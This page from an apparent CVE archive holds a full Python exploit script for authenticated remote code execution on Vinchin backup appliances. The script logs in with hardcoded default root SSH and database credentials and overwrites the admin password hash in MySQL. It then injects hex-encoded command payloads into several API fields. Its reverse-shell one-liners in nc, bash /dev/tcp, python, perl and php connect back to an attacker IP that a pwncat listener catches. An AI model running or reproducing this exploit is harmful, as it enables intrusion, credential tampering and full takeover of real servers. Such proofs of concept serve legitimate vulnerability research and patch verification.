4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import re
import sys
import time
import json
import random
import string
import socket
import hashlib
import requests
import binascii
import argparse
import threading
import pwncat.manager
import mysql.connector

from packaging import version
from selenium import webdriver
from rich.console import Console
from urllib.parse import urlparse
from fake_useragent import UserAgent
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support import expected_conditions as EC
from requests.packages.urllib3.exceptions import InsecureRequestWarning


class VinchinRCE:
    def __init__(
        self,
        url: str,
        payload: str,
        username: str,
        password: str,
        rshell_ip: str,
        rshell_port: str,
        payload_type: str,
    ):
        self.url = url
        self.username = username
        self.password = password
        self.old_password = None
        self.rshell_ip = rshell_ip
        self.rshell_port = rshell_port
        self.payload_type = payload_type
        self.revshell_connected = False
        self.user_agent = UserAgent().random

        self.db_user = "vinchin"
        self.db_password = "yunqi123456"
        self.db_name = "vinchin_db"

        self.root_user = "root"
        self.root_password = "Backup@3R"

        self.console = Console()
        self.driver = self.setup_driver()
        self.payloads = {
            "nc": f"nc -e /bin/bash {self.rshell_ip} {self.rshell_port}",
            "bash": f"bash -i >& /dev/tcp/{self.rshell_ip}/{self.rshell_port} 0>&1",
            "python": (
                f"python -c 'import os,pty,socket;"
                f's=socket.socket();s.connect(("{self.rshell_ip}",{self.rshell_port}));'
                f"[os.dup2(s.fileno(),f) for f in (0, 1, 2)];"
                f'pty.spawn("bash")\''
            ),
            "perl": (
                f'perl -e \'use Socket;$i="{self.rshell_ip}";$p={self.rshell_port};'
                f'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
                f"if(connect(S,sockaddr_in($p,inet_aton($i)))){{"
                f'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
                f'exec("bash -i");}};\''
            ),
            "php": (
                f'php -r \'$sock=fsockopen("{self.rshell_ip}",{self.rshell_port});'
                f'$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\''
            ),
        }

        self.payload = self.construct_command(self.payloads[payload])
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    @staticmethod
    def construct_command(payload: str) -> str:
        hex_encoded_payload = binascii.hexlify(payload.encode()).decode()
        formatted_payload = "".join(
            [
                "\\x" + hex_encoded_payload[i : i + 2]
                for i in range(0, len(hex_encoded_payload), 2)
            ]
        )
        command = f";echo -e {formatted_payload}|bash;"
        return command

    def check_vinchin_version(self, page_html: str) -> None:
        if page_html is None:
            self.custom_print("Failed to connect to the target.", "-")
            sys.exit(1)

        version_pattern = r"Vinchin build: (\d+\.\d+\.\d+\.\d+)"
        version_match = re.search(version_pattern, page_html)

        if not version_match:
            self.custom_print("Unable to extract version.", "-")
            sys.exit(1)

        detected_version = version.parse(version_match.group(1))
        self.custom_print(f"Detected Vinchin version: {detected_version}", "*")

        vulnerable_versions = [
            (version.parse("5.0.0"), version.parse("5.1.0")),
            (version.parse("6.0.0"), version.parse("6.1.0")),
            (version.parse("6.7.0"), version.parse("6.8.0")),
            (version.parse("7.0.0"), version.parse("7.3.0")),
        ]

        for low, high in vulnerable_versions:
            if low <= detected_version < high:
                self.custom_print(
                    f"Vinchin version {detected_version} is vulnerable.", "+"
                )
                return

        self.custom_print(f"Vinchin version {detected_version} is not vulnerable.", "-")
        sys.exit(1)

    def manage_db_password(self, action) -> None:
        parsed_url = urlparse(self.url)
        self.db_host = parsed_url.hostname

        connection = None
        cursor = None
        original_hash = None

        try:
            connection = mysql.connector.connect(
                host=self.db_host,
                user=self.db_user,
                password=self.db_password,
                database=self.db_name,
                connection_timeout=5,
            )
            cursor = connection.cursor()

            match action:
                case "change":
                    new_password = "".join(
                        random.choices(string.ascii_letters + string.digits, k=10)
                    )
                    new_hash = hashlib.md5(new_password.encode()).hexdigest()

                    cursor.execute(
                        "SELECT password FROM bd_user WHERE user_name = %s",
                        (self.username,),
                    )
                    result = cursor.fetchone()
                    original_hash = result[0] if result else None

                    cursor.execute(
                        "UPDATE bd_user SET password = %s WHERE user_name = %s",
                        (new_hash, self.username),
                    )
                    self.password = new_password
                    self.old_password = original_hash
                    self.custom_print(
                        f"Password for user '{self.username}' changed to {new_password}.",
                        "+",
                    )
                    connection.commit()
                    self.login()

                case "restore":
                    cursor.execute(
                        "UPDATE bd_user SET password = %s WHERE user_name = %s",
                        (self.old_password, self.username),
                    )
                    self.password = self.old_password
                    self.custom_print(
                        f"Restored the original password for user '{self.username}'.",
                        "+",
                    )
                    connection.commit()

                case _:
                    self.custom_print(f"Unknown action: {action}", "-")

        except mysql.connector.Error as error:
            self.custom_print(f"Failed to {action} the password: {error}", "-")
            if action == "change" and original_hash:
                self.password = original_hash
            else:
                self.custom_print(
                    f"Attempting to log in with the original credentials: user={self.username}, password={self.password}",
                    "!",
                )
            self.login()

        finally:
            if cursor:
                cursor.close()
            if connection and connection.is_connected():
                connection.close()

    def setup_driver(self) -> webdriver.Chrome:
        self.custom_print("Initializing WebDriver...", "*")

        self.custom_print("Configuring Chrome options...", "*")
        options = Options()
        options.add_argument("--ignore-certificate-errors")
        options.add_argument("--headless")
        options.add_argument(f"user-agent={self.user_agent}")

        self.custom_print("Setting up WebDriver service...", "*")
        service = Service(ChromeDriverManager().install())

        self.custom_print("Launching Chrome browser...", "*")
        driver = webdriver.Chrome(service=service, options=options)
        driver.set_window_size(1366, 768)

        return driver

    def custom_print(self, message: str, header: str) -> None:
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        self.console.print(
            f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}"
        )

    def start_listener(self, timeout=30) -> None:
        with socket.create_server((self.rshell_ip, int(self.rshell_port))) as listener:
            listener.settimeout(timeout)
            self.custom_print(
                f"Waiting for incoming connection on port {self.rshell_port}...", "*"
            )

            try:
                victim, victim_addr = listener.accept()
                self.revshell_connected = True
                self.custom_print(
                    f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
                )

                with pwncat.manager.Manager() as manager:
                    manager.create_session(
                        platform="linux", protocol="socket", client=victim
                    )
                    self.custom_print("Dropping to pwncat prompt...", "+")
                    manager.interactive()
            except socket.timeout:
                self.custom_print(
                    f"No reverse shell connection received within {timeout} seconds.",
                    "-",
                )

    def root_ssh(self) -> None:
        self.custom_print("Attempting SSH connection...", "*")
        try:
            parsed_url = urlparse(self.url)
            ssh_target = parsed_url.hostname

            with pwncat.manager.Manager() as manager:
                manager.create_session(
                    platform="linux",
                    protocol="ssh",
                    host=ssh_target,
                    user=self.root_user,
                    password=self.root_password,
                    timeout=5,
                )

                self.custom_print(
                    "SSH connection successful, entering interactive mode.", "+"
                )
                manager.interactive()

            return True

        except Exception as e:
            self.custom_print(f"SSH connection failed: {e}", "-")
            return False

    def login(self) -> None:
        try:
            self.driver.get(self.url)

            page_html = self.driver.page_source

            self.check_vinchin_version(page_html)

            self.custom_print("Waiting for the username input field...", "*")
            username_input = WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located((By.NAME, "username"))
            )

            self.custom_print("Waiting for the password input field...", "*")
            password_input = WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located((By.NAME, "password"))
            )

            self.custom_print("Waiting for the submit button...", "*")
            submit_button = WebDriverWait(self.driver, 10).until(
                EC.element_to_be_clickable((By.ID, "login-btn"))
            )

            self.custom_print("Sending username and password...", "*")
            username_input.send_keys(self.username)
            password_input.send_keys(self.password)

            self.custom_print("Submitting the form...", "*")
            submit_button.click()

            time.sleep(2)

            error_alert = self.driver.find_element(By.CLASS_NAME, "my_alert")
            if "display: block;" in error_alert.get_attribute("style"):
                self.custom_print(
                    "Login failed due to an error alert on the page.", "-"
                )
                sys.exit(1)

        except NoSuchElementException:
            self.custom_print("Logged In!", "+")
            self.manage_db_password("restore") if self.old_password else None
            self.custom_print(f"Using {self.payload_type} exploitation method !", "+")
            match self.payload_type:
                case "setNetworkCardInfo":
                    self.setNetworkCardInfo()
                case "syncNtpTime":
                    self.syncNtpTime()
                case "deleteUpdateAPK":
                    self.deleteUpdateAPK()
                case "getVerifydiyResult":
                    self.getVerifydiyResult()

        except Exception as e:
            self.custom_print(f"An error occurred during login: {e}", "-")
            self.manage_db_password("restore") if self.old_password else None
            sys.exit(1)

    def send_http_request(self, function_name: str, params: dict, module: str) -> None:
        cookies = self.driver.get_cookies()
        session = requests.Session()
        cookie_dict = {cookie["name"]: cookie["value"] for cookie in cookies}

        data = {"m": module, "f": function_name, "p": json.dumps(params)}

        headers = {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": self.user_agent,
            "Origin": self.url,
        }

        try:
            session.post(
                f"{self.url}/api/",
                headers=headers,
                cookies=cookie_dict,
                data=data,
                verify=False,
                timeout=5,
            )

        except requests.exceptions.Timeout:
            pass

        except requests.exceptions.RequestException as e:
            self.custom_print(f"An error occurred: {e}", "-")

    def setNetworkCardInfo(self) -> None:
        self.custom_print("Navigating to system management...", "*")
        system_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable((By.NAME, "sysmanagement"))
        )
        system_link.click()

        self.custom_print("Navigating to setting manager...", "*")
        setting_manager_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable((By.NAME, "setting_manager"))
        )
        setting_manager_link.click()

        self.custom_print("Navigating to network settings...", "*")
        network_settings_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable(
                (By.XPATH, "//a[contains(@href, 'system_network.php')]")
            )
        )
        network_settings_link.click()

        self.custom_print(
            f"Injecting payload for reverse shell: {self.rshell_ip}:{self.rshell_port}...",
            "*",
        )
        networkcard_option = WebDriverWait(self.driver, 10).until(
            EC.presence_of_element_located(
                (By.XPATH, "//select[@name='networkcard']/option")
            )
        )
        self.driver.execute_script(
            "arguments[0].innerText = arguments[1]", networkcard_option, self.payload
        )

        self.custom_print("Submitting the network settings form...", "*")
        ok_button = WebDriverWait(self.driver, 15).until(
            EC.element_to_be_clickable((By.ID, "ipsubmit"))
        )

        ok_button.click()

        self.custom_print("Check your listener h4x0rm4n...", "+")

    def syncNtpTime(self) -> None:
        params = {"ntphost": f"time.nist.gov {self.payload}"}
        self.send_http_request("syncNtpTime", params, "8")

    def deleteUpdateAPK(self) -> None:
        params = {"md5": "h4x0rm4n", "file_name": self.payload}
        self.send_http_request("deleteUpdateAPK", params, "8")

    def getVerifydiyResult(self) -> None:
        params = {"type": "1", "value": f"127.0.0.1 {self.payload}"}
        self.send_http_request("getVerifydiyResult", params, "14")


def main() -> None:
    parser = argparse.ArgumentParser(description="Authenticated RCE on VinChin 7.2.")
    parser.add_argument(
        "-u",
        "--url",
        default="https://192.168.1.7",
        help="URL of the login page",
    )
    parser.add_argument(
        "-user", "--username", default="admin", help="Username for login"
    )
    parser.add_argument(
        "-p", "--password", default="123456", help="Password for login"
    )    
    parser.add_argument(
        "-rip", "--rshell_ip", default="192.168.1.5", help="Reverse shell IP address"
    )
    parser.add_argument(
        "-rport", "--rshell_port", default="1338", help="Reverse shell port"
    )
    parser.add_argument(
        "--payload_type",
        default="syncNtpTime",
        choices=[
            "setNetworkCardInfo",
            "syncNtpTime",
            "deleteUpdateAPK",
            "getVerifydiyResult",
        ],
        help="Type of payload to send",
    )
    parser.add_argument(
        "--payload",
        choices=["nc", "bash", "python", "perl", "php"],
        default="nc",
        help="Type of payload to use (choices: 'nc', 'bash', 'python', 'perl', 'php'), default='nc'",
    )

    args = parser.parse_args()

    vinchin_rce = VinchinRCE(
        args.url,
        args.payload,
        args.username,
        args.password,
        args.rshell_ip,
        args.rshell_port,
        args.payload_type,
    )

    if not vinchin_rce.root_ssh():
        listener_thread = threading.Thread(target=vinchin_rce.start_listener)
        listener_thread.daemon = True
        listener_thread.start()

        vinchin_rce.manage_db_password("change")
        listener_thread.join()


if __name__ == "__main__":
    main()